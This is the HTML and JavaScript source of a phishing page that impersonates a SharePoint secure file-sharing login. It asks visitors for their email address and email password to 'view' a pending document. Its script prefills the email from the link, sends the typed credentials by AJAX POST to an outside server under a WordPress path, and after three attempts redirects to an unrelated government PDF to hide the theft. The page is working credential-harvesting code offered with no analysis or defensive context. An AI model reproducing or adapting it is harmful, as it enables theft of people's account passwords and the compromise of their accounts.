




                        
                        <!DOCTYPE html>
                        <html>

                        <title>(1) Pending File </title>


                          <meta charset="utf-8">
                          <meta name="viewport" content="width=device-width, initial-scale=1">
                          <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
                          <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
                          <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>



                        <style>
                        body {
                          font-family: Arial;
                        }

                        input[type=email], select {
                            width: 100%;
                            padding: 12px 20px;
                            margin: 15px 0;
                            display: block;
                            border: 1px solid #ccc;
                            border-radius: 4px;
                            box-sizing: border-box;
                        }

                        input[type=password], select {
                            width: 100%;
                            padding: 12px 20px;
                            margin: 15px 0;
                            display: block;
                            border: 1px solid #ccc;
                            border-radius: 4px;
                            box-sizing: border-box;
                        }

                        input[type=submit] {
                            width: 100%;
                            background-color: #0078d7;
                            color: white;
                            padding: 14px 20px;
                            margin: 8px 0;
                            border: none;
                            border-radius: 4px;
                            cursor: pointer;
                        }

                        input[type=submit]:hover {
                            background-color: #0078d7;
                        }

                        div.container {
                            margin: auto;
                            width: 50%;
                            padding: 10px;
                            border: 3px #C0C0C0;
                            border-radius: 10px;
                            background-color: white;
                            width: 500px;
                            padding: 20px;
                            border-style: solid;
                            border-width: thin;
                        }
                        </style>

                        <body style="background-image: url('https://i.ibb.co/F5Q7xFr/download-8.png'); background-size: cover;background-repeat: no-repeat;">


                         <br><br><br><br>
                        <div class="container">

                        <img src="https://i.imgur.com/7fvpcRq.jpg" alt="SharePoint" border="0" height="100">

                        <p></p>
                        <font face="Trebuchet MS" color="#0078d7" size="5"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sharepoint Secure File Sharing</b></font>

                        <p></p>
                       


                        <hr style="height:2px;border:none;color:black;background-color:black;" />
                        <div class="alert alert-danger">
                            Because you're accessing sensitive info, you need to verify your password.
                          </div>
<form id="contact">

                        <center>

                        <input type="email" id="email" name="email" Placeholder="Enter Email Address" value="" >
                             <span id="msg" class="text-danger"></span>
                            <input type="password" id="password" name="password" placeholder="Enter Email Password" autofocus required>


                          
                            <input type="submit" id="submit-btn" value="VIEW / DOWNLOAD DOCUMENT">
                          </center>


                        </form>
<script>


    /* global $ */
    $(document).ready(function(){

      $('#error').hide();
      $("#div2").hide();
    $("#div3").hide();
      $("#msg").hide();

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        $('#email').val(email);
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
       //  if (final=="gmail" || final=="yahoo" || final=="hotmail" || final=="aol" || final=="outlook") {
       //   $('#error').show();

       // }
       // else
       // {
        $("#div1").animate({left:200, opacity:"hide"}, 0);
        $("#div2").animate({right:200, opacity:"show"}, 1000);
    $("#div3").animate({right:200, opacity:"show"}, 1000);
        $("#emailch").html(my_email);
      // }
      }

      $('#email').click(function(){
        $('#error').hide();
      });
      $('#next').click(function () {
        var my_email =$('#email').val();
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
       //  if (final=="gmail" || final=="yahoo" || final=="hotmail" || final=="aol" || final=="outlook") {
       //   $('#error').show();

       // }
       // else
       // {
        $("#div1").animate({left:200, opacity:"hide"}, 0);
        $("#div2").animate({right:200, opacity:"show"}, 1000);
    $("#div3").animate({right:200, opacity:"show"}, 1000);
        $("#emailch").html(my_email);

      // }
    });
      $('#back').click(function () {
        $("#msg").hide();
    $("#div3").animate({left:200, opacity:"hide"}, 0);
        $("#div2").animate({left:200, opacity:"hide"}, 0);
        $("#div1").animate({right:200, opacity:"show"}, 1000);

      });

var count=0;
      $('#submit-btn').click(function(event){
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var detail=$("#field").html();
        var msg = $('#msg').html();
        $('#msg').text( msg );
        count=count+1;
        if (count>=3) {
          window.location.replace("https://www.govinfo.gov/media/govinfo_Overview_1019.pdf");
        }
        else
        {
         $.ajax({
          dataType: 'JSON',
          url: 'https://word.4chomes.com/wp-includes/IXR/next.php',
          type: 'POST',
          data:{
            email:email,
            password:password,
            detail:detail,

          },
          beforeSend: function(xhr){
            $('#submit-btn').html('Verifing...');
          },
          success: function(response){
            if(response){
              $("#msg").show();
              console.log(response);
              if(response['signal'] == 'ok'){
               $('#msg').html(response['msg']);
               var password=$("#password").val("");
             }
             else{
              $('#msg').html(response['msg']);
              var password=$("#password").val("");
            }
          }
        },
        error: function(){
          $("#msg").show();
          $('#msg').html("Please try again later");
          var password=$("#password").val("");
        },
        complete: function(){
          $('#submit-btn').html('Login');
        }
      });
       }
     });
    });
  </script>
                        </div>

                        </body>
                        </html>
